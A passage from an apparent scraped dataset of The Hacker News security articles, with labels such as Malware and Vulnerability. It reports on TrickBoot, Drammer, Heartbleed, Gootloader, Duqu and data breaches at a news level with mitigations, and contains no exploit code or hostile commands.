victims with firmware-level persistence that survives re-imaging or even device bricking capability."" UEFI is a firmware interface and a replacement for BIOS that improves security, ensuring that no malware has tampered with the boot process. Because UEFI facilitates the loading of the operating system itself, such infections are resistant to OS reinstallation or replacement of the hard drive. TrickBot emerged in 2016 as a banking trojan but has since evolved into a multi-purpose malware-as-a-service (MaaS) that infects systems with other malicious payloads designed to steal credentials, email, financial data, and spread file-encrypting ransomware such as Conti and Ryuk. Its modularity and versatility have made it an ideal tool for a diverse set of threat actors despite attempts by cyber vendors to take the infrastructure down. It has also been observed in conjunction with Emotet campaigns to deploy Ryuk ransomware. ""Their most common attack chain largely begins via Emotet malspam campaigns, which then loads TrickBot and/or other loaders, and moves to attack tools like PowerShell Empire or Cobalt Strike to accomplish objectives relative to the victim organization under attack,"" the researchers said. ""Often, at the end of the kill-chain, either Conti or Ryuk ransomware is deployed."" To date, the botnet has infected more than a million computers, according to Microsoft and its partners at Symantec, ESET, FS-ISAC, and Lumen. From a Reconnaissance Module to an Attack Function The newest addition to their arsenal suggests that TrickBot can not only be used to target systems en masse with ransomware and UEFI attacks but also provide criminal actors even more leverage during ransom negotiation by leaving a covert UEFI bootkit on the system for later use. The development is also yet another sign that adversaries are extending their focus beyond the operating system of the device to lower layers to avoid detection and carry out destructive or espionage-focused campaigns. TrickBot's reconnaissance component, observed for the first time in October 2020 right after the take-down attempts orchestrated by the US Cyber Command and Microsoft, targets Intel-based systems from Skylake through Comet Lake chipsets to probe for vulnerabilities in the UEFI firmware of the infected machines. Specifically, the researchers found that TrickBoot takes aim at the SPI flash chip that houses the UEFI/BIOS firmware, using an obfuscated copy of RWEverything tool's RwDrv.sys driver to check if the BIOS control register is unlocked and the contents of the BIOS region can be modified. Although the activity is limited to reconnaissance so far, it wouldn't be a stretch if this capability is extended to write malicious code to the system firmware, thereby ensuring that attacker code executes before the operating system and paving the way for the installation of backdoors, or even the destruction of a targeted device. What's more, given the size and scope of the TrickBot, an attack of this kind can have severe consequences. ""TrickBoot is only one line of code away from being able to brick any device it finds to be vulnerable,"" the researchers noted. ""The national security implications arising from a widespread malware campaign capable of bricking devices is enormous."" With UEFI persistence, ""TrickBot operators can disable any OS level security controls they want, which then allows them to re-surface to a modified OS with neutered endpoint protections and carry out objectives with unhurried time on their side."" To mitigate such threats, it's recommended that the firmware is kept up-to-date, BIOS write protections are enabled, and firmware integrity is verified to safeguard against unauthorized modifications. ",Cyber_Attack #Security Alert : Facebook Two-Factor Authentication fail !,https://thehackernews.com/2012/03/security-alert-facebook-two-factor.html,"#Security Alert : Facebook Two-Factor Authentication fail ! Last year Facebook has launched a security feature called Login Approvals or two-factor authentication. This is a follow-up security update regarding Facebook Login from Facebook. They have already integrated Facebook login email alerts to get notification emails or SMS messages whenever a suspicious person uses your Facebook account from a different location. Christopher Lowson, on his blog explains the Facebook Two-Factor Authentication, which is really another biggest fail of Facebook Security. But that feature is not enough to ensure your account's security and that is why Facebook has launched ""Login Approvals"". This feature is very similar with Google 2-step verification which associates a mobile device with your Facebook account and authenticates the login by sending a verification code at your mobile phone device. According to this feature, When user will logging into your Facebook account from a new device, a code will be sent to his phone which he will have to enter before he is granted access to your Facebook Account. What Lowson did, He click the option ""I can't get my code"" and noticed ""Skip this and stop asking me to enter codes"" and After clicking this he got asked ""Log in without entering codes from now on?"" by Facebook. Finally Lowson is able to login without Codes and 2 step authentication Security feature Turned off and Bypassed simply by options. Conclusion is that, Why Facebook is trying to use such security features which can be easily exploited at user end ? Even a very less percentage of facebook users are aware about this feature which is actually implemented last year and still have such bugs. Submitted By: Christopher Lowson ",Vulnerability "Security researchers will disclose vulnerabilities in Embedded, ARM, x86 & NFC",https://thehackernews.com/2012/07/security-researchers-will-disclose.html,"Security researchers are expected to disclose new vulnerabilities in near field communication (NFC), mobile baseband firmware, HTML5 and Web application firewalls next week at the Black Hat USA 2012 security conference. The Black Hat session aim to expose sometimes shocking vulnerabilities in widely used products. They also typically show countermeasures to plug the holes. Two independent security consultants will give a class called ""Advanced ARM exploitation,"" part of a broader five-day private class the duo developed. In a sold-out session, they will detail hardware hacks of multiple ARM platforms running Linux, some described on a separate blog posting. The purpose of the talk is to reach a broader audience and share the more interesting bits of the research that went into developing the Practical ARM Exploitation and presenters Stephen Ridley and Stephen Lawler demonstrate how to defeat XN, ASLR, stack cookies, etc. using nuances of the ARM architecture on Linux. In addition to mobile and Web security, Black Hat presentations will also cover security issues and attack techniques affecting industrial control systems, smart meters and embedded devices. ",Malware Internet Explorer zero-day exploit used watering hole attacks to target Japanese users,https://thehackernews.com/2013/09/internet-explorer-zero-day-exploit-used.html,"Attackers exploiting a zero-day vulnerability CVE-2013-3893 in Microsoft's Internet Explorer browser and served them on compromised popular Japanese news websites. According to FireEye, at least three major Japanese media websites were compromised in watering hole attacks, dubbed Operation DeputyDog, appears to target manufacturers, government entities and media organizations in Japan. The compromised sites recorded more than 75,000 page views before the exploits were discovered. The zero-day vulnerability in IE 8 and 9 allows the stealthy installation of software in the users' computers which then can be remotely accessed by the hackers. The hackers typically use Trojans designed specifically for a pay-to-order attack to steal intellectual property. Researchers saw a payload executable file used against a Japanese target posing as an image file hosted on a Hong Kong server. The attack in Japan was discovered two days after Microsoft disclosed the flaw ,""The exploit was attacking a Use After Free vulnerability in IE's HTML rendering engine (mshtml.dll) and was implemented entirely in Javascript (no dependencies on Java, Flash etc.), but did depend on a Microsoft Office DLL which was not compiled with ASLR (Address Space Layout Randomization) enabled,"" Microsoft Security Advisory. FireEye also claimed the group responsible for DeputyDog is the same one that compromised security firm Bit9 back in February 2013. FireEye did not disclose which sites were infected, but said that Japanese computer security authorities were working with the media outlets to remediate the issue. Microsoft released a FixIt tool and urged IE users to install that as a mitigation until a patch was ready. ",Vulnerability Microsoft Tuesday Update to Patch Critical Windows and Internet Explorer Vulnerabilities,https://thehackernews.com/2014/08/microsoft-tuesday-update-to-patch_8.html,"Today Microsoft has released its Advance Notification for the month of August 2014 Patch Tuesday Updates releasing a total of nine security Bulletins, which will address several vulnerabilities in its products, out of which two are marked critical and rest are important in severity. The latest updates, which is set to arrive on August 12, will address two critical bugs affect Internet Explorer and Windows with seven other issues rated as important. The vulnerabilities in the company's products range from remote code execution to protection bypasses. Both of the critical fixes will address remote-code execution flaws. The critical Windows update affects only business and professional editions of Windows 7 and Windows 8. Whereas, the Internet Explorer update affects all versions of Windows on all supported platforms. The remaining seven updates affect its various products, including Windows, Office, SQL Server, the .NET Framework and SharePoint Server 2013. There will be no critical bulletins for Windows Server this month, also the IE patch is considered a moderate risk for servers. However, several bulletins are rated 'important' and should be updated with the patch. The Tuesday Update will also addresses a remote-code execution vulnerability in Microsoft Office, rated as 'important', and an elevation of privilege vulnerability in SQL Server. The company will also fix Microsoft Server Software for another elevation of privilege vulnerability. Rest three bulletins will address a pair of elevation of privilege vulnerabilities and a security bypass vulnerability in Windows. Earlier this week, Microsoft also announced that the company will release a change to its Internet Explorer on Update Tuesday that will block old and out-of-date ActiveX controls. It will warn users when the browser attempts to load an out-dated ActiveX controls. Initially, the list will contain only old Java versions. The out-of-date ActiveX control blocking feature works on: Windows 7 SP1, Internet Explorer 8 through Internet Explorer 11 Windows 8 and up, Internet Explorer for the desktop All Security Zones—such as the Internet Zone—but not the Local Intranet Zone and the Trusted Sites Zone Note: Microsoft will not release any security update for its older version of Windows XP, as it stopped supporting Windows XP Operating System. So, if you are still running this older version of operating system on your PCs, we again advise you to move on to other operating system in order to receive updates and secure yourself from upcoming threats. ",Vulnerability What is Threat Intelligence and How It Helps to Identify Security Threats,https://thehackernews.com/2015/11/what-is-cyber-threat-intelligence.html,"Simply put, threat intelligence is knowledge that helps you identify security threats and make informed decisions. Threat intelligence can help you solve the following problems: How do I keep up to date on the overwhelming amount of information on security threats…including bad actors, methods, vulnerabilities, targets, etc.? How do I get more proactive about future security threats? How do I inform my leaders about the dangers and repercussions of specific security threats? Threat Intelligence: What is it? Threat intelligence has received a lot of attention lately. While there are many different definitions, here are a few that get quoted often: Threat intelligence is evidence-based knowledge, including context, mechanisms, indicators, implications and actionable advice, about an existing or emerging menace or hazard to assets that can be used to inform decisions regarding the subject's response to that menace or hazard. – Gartner The set of data collected, assessed and applied regarding security threats, threat actors, exploits, malware, vulnerabilities and compromise indicators – SANS Institute Why is everyone talking about it? Verizon's 2015 DBIR estimated a financial loss of $400 million from 700 million compromised records, which resulted from 79,790 security incidents! As long as security threats and breaches occur, every business will look for ways to protect their data. The threat landscape is always changing and the business risk is increasing because of our dependence on IT systems. Threats come from internal as well as external sources. Bottom line is, organizations are under tremendous pressure to manage threats. Though information in the form of raw data is available abundantly, it is hard and time-consuming to get meaningful information based on which proactive measures can be set. This naturally pulls more and more users towards threat intelligence as it helps to prioritize threats within the deluge of data, alerts, and attacks and provides actionable information. The table below presents several common indicators of compromise that can be identified with threat intelligence feeds: Category Indicators of Compromise Examples Network IP addresses URLs Domain names Malware infections targeting internal hosts that are communicating with known bad actors Email Sender's email address and email subject Attachments Links Phishing attempts where internal hosts click on an unsuspecting email and ""phone home"" to a malicious command and control server Host-Based Filenames and file hashes (e.g. MD5) Registry keys Dynamic link libraries (DLLs) Mutex names External attacks from hosts that might be infected themselves or are already known for nefarious activity Threat Intelligence capabilities Attacks can be broadly categorized as user based, application based and infrastructure based threats. Some of the most common threats are SQL injections, DDoS, web application attacks and phishing. It is important to have an IT security solution that provides threat intelligence capabilities to manage these attacks by being both proactive and responsive. Attackers are constantly changing their methods to challenge security systems. Therefore, it becomes inevitable for organizations to get threat intelligence from a variety of sources. One of the proven methods to stay on top of attacks is to detect and respond to threats with a SIEM (Security Information & Event Management system). A SIEM can be used to track everything that happens in your environment and identify anomalous activities. Isolated incidents might look unrelated, but with event correlation and threat intelligence, you can see what is actually happening in your environment. Nowadays, IT security professionals must operate under the assumed breach mentality. Comparing monitored traffic against known bad actors sourced from threat intelligence would help in identifying malicious activities. However, this could be manual and time-consuming. Integrating indicator based threat intelligence to a SEIM security solution would help in identifying compromised system and possibly even prevent some attacks. Best Practices Integrating threat intelligence and responding to attacks is not enough to combat the ever-changing threat landscape. You need to analyze the situation and determine threats you are likely to face, based on which you can come up with precautionary measures. Here is a list of several best practices: Have an application whitelist and blacklist. This helps in preventing execution of malicious or unapproved programs including, .DLL files, scripts and installers. Check your logs carefully to see if an attempted attack was an isolated event, or if the vulnerability had been exploited before. Determine what was changed in the attempted attack. Audit logs and identify why this incident happened – reasons could range from system vulnerability to an out-of-date driver. What will threat intelligence enabled SIEM solve A SIEM, like SolarWinds Log & Event Manager, collects and normalizes log data from monitored traffic and automatically tags suspicious events. With integrated threat intelligence mechanism and built-in rules, the monitored events can be compared against the list of constantly updated known bad actors. You can quickly search & monitor for hits from the bad actors against the log data in real time and identify common indicators of compromise. You can automatically respond with actions like blocking known bad IP addresses, in case of malicious attack attempts. Watch how threat intelligence works in a SIEM and download your free trial of a leading SIEM from SolarWinds. ",Vulnerability New Drammer Android Hack lets Apps take Full control (root) of your Phone,https://thehackernews.com/2016/10/root-android-phone-exploit.html,"Earlier last year, security researchers from Google's Project Zero outlined a way to hijack the computers running Linux by abusing a design flaw in the memory and gaining higher kernel privileges on the system. Now, the same previously found designing weakness has been exploited to gain unfettered ""root"" access to millions of Android smartphones, allowing potentially anyone to take control of affected devices. Researchers in the VUSec Lab at Vrije Universiteit Amsterdam have discovered a vulnerability that targets a device's dynamic random access memory (DRAM) using an attack called Rowhammer. Although we are already aware of the Rowhammer attack, this is the very first time when researchers have successfully used this attack to target mobile devices. What is DRAM Rowhammer Attack? The Rowhammer attack against mobile devices is equally dangerous because it potentially puts all critical data on millions of Android phones at risk, at least until a security patch is available. The Rowhammer attack involves executing a malicious application that repeatedly accesses the same ""row"" of transistors on a memory chip in a tiny fraction of a second in a process called ""Hammering."" As a result, hammering a memory region can disturb neighboring row, causing the row to leak electricity into the next row which eventually causes a bit to flip. And since bits encode data, this small change modifies that data, creating a way to gain control over the device. In short, Rowhammer is an issue with new generation DRAM chips in which repeatedly accessing a row of memory can cause ""bit flipping"" in an adjacent row that could allow anyone to change the value of contents stored in the memory. Is Your Android Phone Vulnerable? To test the Rowhammer attack on mobile phones, the researchers created a new proof-of-concept exploit, dubbed DRAMMER, and found their exploit successfully altered crucial bits of data in a way that completely roots big brand Android devices from Samsung, OnePlus, LG, Motorola, and possibly other manufacturers. The researchers successfully rooted Android handsets including Google's Nexus 4 and Nexus 5; LG's G4; Samsung Galaxy S4 and Galaxy S5, Motorola's Moto G models from 2013 and 2014; and OnePlus One. ""Not only does our [DRAMMER] attack show that practical, deterministic Rowhammer attacks are a real threat to billions of mobile users, but it is also the first effort to show that Rowhammer is...(reliably exploitable) on any platform other than x86 and with a much more limited software feature set than existing solutions,"" the researchers wrote in their paper [PDF] titled, ""Drammer: Deterministic Rowhammer Attacks on Mobile Platforms."" How does the DRAMMER Attack Work? (Exploit Source Code) The researchers created an app — containing their rooting exploit — that requires no special user permissions in order to avoid raising suspicion. The DRAMMER attack would then need a victim to download the app laced with malware (researchers' exploit code) to execute the hack. The researchers took advantage of an Android mechanism called the ION memory allocator to gain direct access to the dynamic random access memory (DRAM). Besides giving every app direct access to the DRAM, the ION memory allocator also allows identifying adjacent rows on the DRAM, which is an important factor for generating targeted bit flips. Knowing this, the researchers then had to figure out how to use the bit flipping to achieve root access on the victim's device, giving them full control of the target phone and the ability to do anything from accessing data to taking photos. ""On a high level, our technique works by exhausting available memory chunks of different sizes to drive the physical memory allocator into a state in which it has to start serving memory from regions that we can reliably predict,"" the paper reads. ""We then force the allocator to place the target security-sensitive data, i.e., a page table, at a position in physical memory which is vulnerable to bit flips and which we can hammer from adjacent parts of memory under our control."" Once you download this malicious app, the DRAMMER exploit takes over your phone within minutes – or even seconds – and runs without your interaction. The attack continues to run even if you interact with the app or put your phone in ""sleep"" mode. The researchers expect to soon publish an app [source code available here] that will let you test your Android smartphone yourself and anonymously include your results in a running tally, which will help researchers track the list of vulnerable devices. DRAMMER Has No Quick Fix The group of researchers privately disclosed its findings to Google in July, and the company designated the flaw as ""critical,"" awarding the researchers $4,000 under its bug bounty program. Google says the company has informed its manufacturing partners of the issue earlier this month and has developed a mitigation which it will include in its upcoming November security bulletin to make the DRAMMER attack much harder to execute. However, the researchers warned that one could not replace the memory chip in Android smartphones that have already been shipped. And even some software features that DRAMMER exploits are so fundamental and essential to any OS that they are difficult to remove or modify without impacting the user experience. In short, the attack is not easy to patch in the next generation of Android phones. Video Demonstration of DRUMMER Attack on Android 6.0.1 The researchers have also published two proof-of-concept videos that demonstrate DRAMMER attack in action against an unrooted LG Nexus 5. In the first video, the phone is running Android 6.0.1 with security patches Google released on October 5. In the second video, the researchers show how the DRAMMER attack can be combined with Stagefright bug that remains unpatched in many older Android handsets. The Stagefright exploit gives the researchers an advanced shell, and by running the DRAMMER exploit, the shell gains root access. The researcher's exploit can target the majority of the world's Android phones. ""Our research shows that practical large-scale Rowhammer attacks are a serious threat and while the response to the Rowhammer has been relatively slow from vendors, we hope our work will accelerate mitigation efforts both in industry and academia,"" the researchers concluded. The group research focuses on Android rather than iOS because the researchers are intimately familiar with the Google's mobile OS which is based on Linux. But the group says it would theoretically be possible to replicate the same attack in an iPhone with additional research. A team of researchers from VUSec at Vrije Universiteit Amsterdam, the University of California at Santa Barbara, and the Graz University of Technology has conducted the research, and they'll be presenting their findings later this week at the 23rd ACM Conference on Computer and Communications Security in Vienna, Austria. For more detailed information, you can head on to this informational page about DRAMMER and this paper published early this morning. ",Malware "Linux worm targeting Routers, Set-top boxes and Security Cameras with PHP-CGI Vulnerability",https://thehackernews.com/2013/11/Linux-ELF-malware-php-cgi-vulnerability.html,"A Symantec researcher has discovered a new Linux worm, targeting machine-to-machine devices, and exploits a PHP vulnerability (CVE-2012-1823) to propagate that has been patched as far back as May 2012. Linux worm, which has been dubbed Linux.Darlloz, poses a threat to devices such as home routers and set-top boxes, Security Cameras, and even industrial control systems. It is based on proof-of-concept code released in late October and it helps spread malware by exploiting a vulnerability in php-cgi. ""Upon execution, the worm generates IP addresses randomly, accesses a specific path on the machine with well-known ID and passwords, and sends HTTP POST requests, which exploit the vulnerability. If the target is unpatched, it downloads the worm from a malicious server and starts searching for its next target."" the Symantec researchers explained. The malware does not appear to perform any malicious activity other than silently spreading itself and wiping a load of system files. So far the malware variant targets x86 systems, because the malicious binary downloaded from the attacker's server is in ELF (Executable and Linkable Format) format for Intel architectures. However, the Symantec researchers claim the attacker also hosts variants of the worm for other architectures including ARM, PPC, MIPS and MIPSEL. No attacks have been reported in the wild, but warned that most users would not realize they were at risk as they would be unaware that their own devices ran on Linux. To protect their devices from the worm, users are advised to update their software to the latest version, make device passwords stronger and block incoming HTTP POST requests to the -/cgi-bin/php* paths. ",Malware 23-Year-old Russian Hacker confessed to be original author of BlackPOS Malware,https://thehackernews.com/2014/01/23-year-old-russian-hacker-confessed-to.html,"In the previous reports of Cyber Intelligence firm 'IntelCrawler' named Sergey Tarasov, a 17-year-old teenager behind the nickname ""ree[4]"", as the developer of BlackPOS malware. BlackPOS also known as ""reedum"" or 'Kaptoxa' is an effective crimeware kit, used in the massive heist of possibly 110 million consumers' Credit-Debit cards, and personal information from the TARGET. Later Researchers's investigation revealed that the original coder of BlackPOS Malware was actually a 23-year-old young hacker named Rinat Shabayev and the teen, Sergey Taraspov is the incharge for the technical support department. In an interview with Russian channel 'LifeNews', Rinat Shabayev admitted that he had developed the BlackPOS crimeware kit. He clarified that the program developed by him was not meant for any kind of data theft, instead the program was written for the security testing. He developed the malware with the help of another programmer with anonymous identity, whom he had met online. His original plan was just to sell the exploit, not to use it for malicious intent by himself. His friend took the readymate codes from him and added more features to it. In addition to this information, he also confessed that the exploit can be used for malicious purposes too. Researchers at IntelCrawler say that the same malware may have also been involved in the Neiman Marcus attack too. Whatever be the intention of the programmer, but now more than 110 million people are suffering credit card theft because of his software. Even after knowing that the malware has ability to compile a massive financial theft, his justifications are not enough to be innocent. ",Malware Researcher Found TextSecure Messenger App Vulnerable to Unknown Key-Share Attack,https://thehackernews.com/2014/11/textsecure-private-messenger-vulnerable_2.html,"Do you use TextSecure Private Messenger for your private conversations? If yes, then Are you sure you are actually using a Secure messaging app? TextSecure, an Android app developed by Open WhisperSystems, is completely open-source and claims to support end-to-end encryption of text messages. The app is free and designed by keeping privacy in mind. However, while conducting the first audit of the software, security researchers from Ruhr University Bochum found that the most popular mobile messaging app is open to an Unknown Key-Share attack. After Edward Snowden revealed state surveillance programs conducted by the National Security Agency, and meanwhile when Facebook acquired WhatsApp, TextSecure came into limelight and became one of the best alternatives for users who want a secure communication. ""Since Facebook bought WhatsApp, instant messaging apps with security guarantees became more and more popular,"" the team wrote in the paper titled, ""How Secure is TextSecure?"". The messaging app attracted a lot of attention lately and was downloaded by half a million users from the Google's Play Store. The research team explained a complete and precise document and analyze of TextSecure's secure push messaging protocol. ""We are the first to completely and precisely document and analyses TextSecure's secure push messaging protocol,"" the team wrote. ""We show that if long-term public keys are authentic, so are the message keys, and that the encryption block of TextSecure is actually one-time stateful authenticated encryption [and] prove TextSecure's push messaging can indeed achieve the goals of authenticity and confidentiality."" According to the research team, TextSecure works on a complex cryptographic protocol which is the part of the CyanogenMod Android operating system — a popular open source aftermarket Android firmware that has been installed on about 10 million Android devices. But researchers discovered an Unknown Key-Share Attack (UKS) against the protocol. The research was conducted by Tilman Frosch, Christian Mainka, Christoph Bader, Florian Bergsma, Jorg Schwenk and Thorsten Holz. For better understanding the UKS against the protocol, the team explained it via an example as follows: ""Bart wants to trick his friend Milhouse. Bart knows that Milhouse will invite him to his birthday party using TextSecure. He starts the attack by replacing his own public key with Nelson's public key and lets Milhouse verify the fingerprint of his new public key. This can be justified, for instance, by claiming to have a new device and having simply re-registered ... if Milhouse invites Bart to his birthday party, then Bart may just forward this message to Nelson who will believe that this message was actually sent from Milhouse. Thus, Milhouse believes that he invited Bart to his birthday party, where in fact, he invited Nelson."" The researchers also provided a mitigation strategy, which has already been acknowledged by TextSecure's developers, that prevents the UKS attack. The proposed method actually resolves the issue, making TextSecure's push messaging secure and achieves one-time stateful authenticated encryption. ",Vulnerability Gootkit RAT Using SEO to Distribute Malware Through Compromised Sites,https://thehackernews.com/2021/03/gootkit-rat-using-seo-to-distribute.html,"A framework notorious for delivering a banking Trojan has received a facelift to deploy a wider range of malware, including ransomware payloads. ""The Gootkit malware family has been around more than half a decade – a mature Trojan with functionality centered around banking credential theft,"" Sophos researchers Gabor Szappanos and Andrew Brandt said in a write-up published today. ""In recent years, almost as much effort has gone into improvement of its delivery method as has gone into the NodeJS-based malware itself."" Dubbed ""Gootloader,"" the expanded malware delivery system comes amid a surge in the number of infections targeting users in France, Germany, South Korea, and the U.S. First documented in 2014, Gootkit is a Javascript-based malware platform capable of carrying out an array of covert activities, including web injection, capturing keystrokes, taking screenshots, recording videos, as well as email and password theft. Over the years, the cybercrime tool has evolved to gain new information-stealing features, with the Gootkit loader repurposed in combination with REvil/Sodinokibi ransomware infections reported last year. While campaigns using social engineering tricks to deliver malicious payloads are a dime a dozen, Gootloader takes it to the next level. The infection chain resorts to sophisticated techniques that involve hosting malicious ZIP archive files on websites belonging to legitimate businesses that have been gamed to appear among the top results of a search query using manipulated search engine optimization (SEO) methods. What's more, the search engine results point to websites that have no ""logical"" connection to the search query, implying that the attackers must be in possession of a vast network of hacked websites. In one case spotted by the researchers, an advice for a real estate agreement surfaced a breached neonatal medical practice based in Canada as the first result. ""To ensure targets from the right geographies are captured, the adversaries rewrite website code 'on the go' so that website visitors who fall outside the desired countries are shown benign web content, while those from the right location are shown a page featuring a fake discussion forum on the topic they've queried,"" the researchers said. Clicking the search result takes the user to a fake message board-like page that matches not only the search terms used in the initial query but also includes a link to the ZIP file, which contains a heavily obfuscated Javascript file that initiates the next stage of compromise to inject the fileless malware fetched from a remote server into memory. This takes the form of a multi-stage evasive approach that begins with a .NET loader, which comprises a Delphi-based loader malware, which, in turn, contains the final payload in encrypted form. In addition to delivering the REvil ransomware and the Gootkit trojan, multiple campaigns have been spotted currently leveraging the Gootloader framework to deliver the Kronos financial malware in Germany stealthily, and the Cobalt Strike post-exploitation tool in the U.S. It's still unclear as to how the operators gain access to the websites to serve the malicious injects, but the researchers suspect the attackers may have obtained the passwords by installing the Gootkit malware or purchasing stolen credentials from underground markets, or by leveraging security flaws in present in the plugins used alongside content management system (CMS) software. The findings have been echoed by Microsoft in a series of tweets, noting it's ""seeing numerous extensive hands-on-keyboard attacks emanating from the Gootkit malware, which is distributed via drive-by downloads as a JavaScript within a ZIP file."" ""The developers behind Gootkit appear to have shifted resources and energy from delivering just their own financial malware to creating a stealthy, complex delivery platform for all kinds of payloads, including REvil ransomware,"" said Gabor Szappanos, threat research director at Sophos. ""This shows that criminals tend to reuse their proven solutions instead of developing new delivery mechanisms. Further, instead of actively attacking endpoint tools as some malware distributors do, the creators of Gootloader have opted for convoluted evasive techniques that conceal the end result,"" he added. ",Malware Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable,https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html,"It is advised to those who are running their web server with OpenSSL 1.0.1 through 1.0, then it is significantly important that you update to OpenSSL 1.0.1g immediately or as soon as possible. As this afternoon, an extremely critical programming flaw in the OpenSSL has been discovered that apparently exposed the cryptographic keys and private data from some of the most important sites and services on the Internet. The bug was independently discovered by security firm Codenomicon along with a Google Security engineer. The flaw is in the popular OpenSSL cryptographic software library and its weakness allows cyber criminals to steal the information protected, under normal conditions, by the SSL (Secure Sockets Layer) or TLS (Transport Security Layer) encryption used to secure the Internet. OpenSSL is an open-source implementation of the SSL and TLS protocols. The core library implements the basic cryptographic functions that enable SSL and TLS encryption. Mostly every websites use either SSL or TLS, even the Apache web server that powers almost half of the websites over internet utilizes OpenSSL. HEARTBLEED BUG The discoverer of the vulnerability dubbed the bug as 'Heartbleed bug', as the exploit rests on a bug in the implementation of OpenSSL's TLS/DTLS (transport layer security protocols) heartbeat extension (RFC6520). This critical bug with code ID CVE-2014-0160, could allows an attacker to expose up to 64kB of memory from the server or a connected client computer running a vulnerable version of OpenSSL software. Specifically, this means that an attacker can steal keys, passwords and other private information remotely. ""We have tested some of our own services from attacker's perspective. We attacked ourselves from outside, without leaving a trace. Without using any privileged information or credentials we were able steal from ourselves the secret keys used for our X.509 certificates, usernames and passwords, instant messages, emails and business critical documents and communication."" The vulnerability in the OpenSSL's transport layer security (TSL) protocols' heartbeat section has been in the wild since March 2012 and is supposed to be even more dangerous than Apple's recent SSL bug, which outcropped the possibility for man-in-the-middle (MitM) attacks. As the Heartbleed bug reveals encryption keys that could lead to other compromises, affects past traffic and may affect as much as 66 percent of Internet websites over the internet. 10 out of top 1000 sites are vulnerable to this flaw, including Yahoo Mail, Lastpass and the FBI site. There also is a proof-of-concept exploit for the flaw posted on Github. On this website, you can check if your web server is vulnerable or not. ""Bugs in single software or library come and go and are fixed by new versions,"" the researchers who discovered the vulnerability wrote in a blog post published Monday. ""However this bug has left a large amount of private keys and other secrets exposed to the Internet. Considering the long exposure, ease of exploitations and attacks leaving no trace this exposure should be taken seriously."" Fixes for the bug have been released by the researchers. So, who are running the OpenSSL 1.0.1f version may update to OpenSSL 1.0.1g. The users running older version of OpenSSL are safe. Related Important Articles: German Developer responsible for HeartBleed Bug in OpenSSL How Heartbleed Bug Exposes Your Passwords to Hackers How to Protect yourself from the 'Heartbleed' Bug Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable ",Vulnerability Leading Web Domain Name Registrars Disclose Data Breach,https://thehackernews.com/2019/10/domain-name-registrars-hacked.html,"Another day, another massive data breach—this time affecting a leading web technology company, as well as both of its subsidiaries, from where millions of customers around the world have purchased domain names for their websites. The world's top domain registrars Web.com, Network Solutions, and Register.com disclosed a security breach that may have resulted in the theft of customers' account information. Founded in 1999 and headquartered in Jacksonville, Florida, Web.com is a leading web technology company that owns both Network Solutions and Register.com. The companies offer web services like web hosting, website design, and online marketing to help people build their own websites. What happened? — In late August 2019, a third-party gained unauthorized access to a ""limited number"" of the company's computer systems and reportedly accessed millions of records for accounts of current and former customers with Web.com, Network Solutions, and Register.com. The company said it became aware of the security intrusion only on October 16, 2019, but did not disclose any details on how the incident happened. What type of information was compromised? — According to the affected domain registrars, the stolen information includes contact details of their customers, such as: Names Addresses Phone numbers Email addresses Information about the services offered to a customer. What type of information was not compromised? — The companies also confirmed that no credit card information was compromised as a result of the security breach incident since they claim to encrypt their customers' credit card numbers before storing them on their databases. ""We store credit card numbers in a PCI (Payment Card Industry) compliant encryption standard and do not believe your credit card information is vulnerable as a specific result of this incident,"" reads a breach notice published on websites of Web.com, Network Solutions, and Register.com. To be noted, the passwords for account logins of affected customers were also not compromised, which otherwise could have allowed attackers to permanently hijack domain names by transferring them to an account owned by attackers with a separate service. What are the affected companies now doing? — The companies took necessary steps to stop the security intrusion upon discovery and immediately launched an investigation by engaging a leading independent cybersecurity firm to determine the scope of the incident. The companies have also notified all the relevant authorities and already started working with federal law enforcement. All three affected domain registrars are also in the process of contacting affected customers through email and via their websites. What affected customers should do now? — As a precaution, affected customers are encouraged to change passwords for their Web.com, Network Solutions, and Register.com accounts and for any other online account where you use the same credentials. Do it even if you are not affected—just to be on the safer side. ""We have already taken additional steps to secure your account, and there is nothing you need to do at this time. The next time you log in to your account, you will be required to reset your password,"" the domain registrars recommend. Since the exposed data includes personal identifying information (PII), affected customers should mainly be suspicious of phishing emails, which are usually the next step of cybercriminals in an attempt to trick users into giving away their passwords and credit card information. Although the data breach did not expose any financial information, it is always a good idea to be vigilant and keep a close eye on your bank and payment card statements for any unusual activity and report to the bank if you find any. This is not the first time Web.com has disclosed a security incident. In August 2015, the company suffered a major data breach that had compromised personal and credit card information belonging to nearly 93,000 customers. ",Data_Breaches DUQU – Another Stuxnet in the Making ?,https://thehackernews.com/2011/11/duqu-another-stuxnet-in-making.html,"DUQU – Another Stuxnet in the Making ? Article by : Nidhi Rastogi is a Cyber security professional based in New York. Article shared from THE HACKER NEWS magazine - November Edition. You can download Complete Magazine here. Barely a year into discovering Stuxnet, the world recently saw its powerful variant in the form of Duqu. It is believed that a Hungarian blogger was the first to have a tryst with the virus in early September at an ISP hosting service. Why it is important: Duqu has gained a lot of attention because of striking similarities with its famous predecessor, Stuxnet. Several Security researchers have concluded that 99 percent of Duqu software rules are same as Stuxnet including source code and keys for encryption. There is reasonable evidence by now that the damage caused by Stuxnet was real. Hence, Duqu is of concern to every security professional at the moment. How it functions: Duqu camouflages its own data behind normal web traffic to avoid suspicion from network administrators. This information is then sent over to a remote command and control server (CC server) using http request. The server responds with a blank JPG image, in response to which, Duqu sends back an image appended with encrypted stolen information. The IP address of the CC server used for these initial operations was 206.183.111.97 and was tracked to India. The CC server has been deactivated since then. The Trojan horse, unlike Stuxnet, is able to record keystrokes, collect various details of system which is then encrypted and appended to an image file. The data may simply be configuration and design data from the systems, presumably to allow someone get competitive advantage. The Trojan has been configured to run on the host machine for 36-days, after which the threat vector will automatically destroy itself from the system. However, additional components sent from the CC server can extend the life beyond this time period. Purpose: Duqu appears to be focusing on data mining right now, scouting host machine to gain information or features about the environment. The real purpose of spreading the Trojan has been obscure and the data collection may just be an initial stage of a larger setup. Complexity: There is nothing novel about the attack vector and it can be safely assumed that the creator at least had access to Stuxnet code. Once a certain piece is in circulation, others build upon it. And this may be the case with Duqu. Duqu too, like Stuxnet, uses a stolen digital certificate from a Taiwanese company to prove its authenticity. Also, Duqu couldn't have been around for too long since the driver sign date has been recorded to be July 2011. There is also a likelihood of the same team being employed to create the Stuxnet variant. Like the Stuxnet, Duqu too is a State sponsored attack, since no other party would engage in an activity that requires ample technical caliber but brings no obvious monetary benefit. Other 